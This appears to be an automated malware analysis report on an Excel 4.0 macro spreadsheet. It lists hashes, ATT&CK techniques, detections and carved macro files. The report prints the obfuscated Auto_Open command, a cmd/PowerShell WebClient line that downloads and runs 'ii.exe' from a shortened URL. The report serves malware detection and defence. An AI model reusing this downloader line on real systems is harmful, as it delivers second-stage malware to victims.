Office (OLE) / .XLS malware analysis — malicious · 7eafcf4386fe4ad8

MALICIOUS

Office (OLE) / .XLS

87.5 KB Created: 2020-10-25 18:24:14 Authoring application: Microsoft Excel

MD5: 2c37e2b780112b33d40af28f91291e09 SHA-1: 64e318f3c5624ea18ea2af7d3588dc4998627721 SHA-256: 7eafcf4386fe4ad80dad0f31999fb50ed30b5d2e662277b57754083f2d0e76fd

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File T1566.002 Spearphishing Attachment

The sample is an Excel 4.0 macro-enabled spreadsheet that contains an Auto_Open macro. This macro executes a PowerShell command that downloads a file named 'ii.exe' from the URL https://tinyurl.com/y6m5spjf and then executes it. The XLM macro explicitly constructs the command: 'c' & 'md' & ' /c' & ' powershell' & ' -w 1 (nEw-oB`jecT Net.WebcL`IENt).(\'Down\'+\'loadFile\').In' & 'v' & 'oke(\'https://tinyurl.com/y6m5spjf\',\'ii.exe\')'. This indicates the intent is to download and execute a second-stage payload.

Heuristics 4

ClamAV: Xls.Malware.Abracadabra-10031695-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Abracadabra-10031695-0
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_macros.txt` `f3eac7d7dc642ae8c99a4e36ee8d62f28077e137ee995510e98cf7613c6ddf19`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	1917 bytes
`macros.bas` `953bf125fb95a97d67f1dfae6bad54545952dd76d888d2a1cbcc94e4187e5630`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1065 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.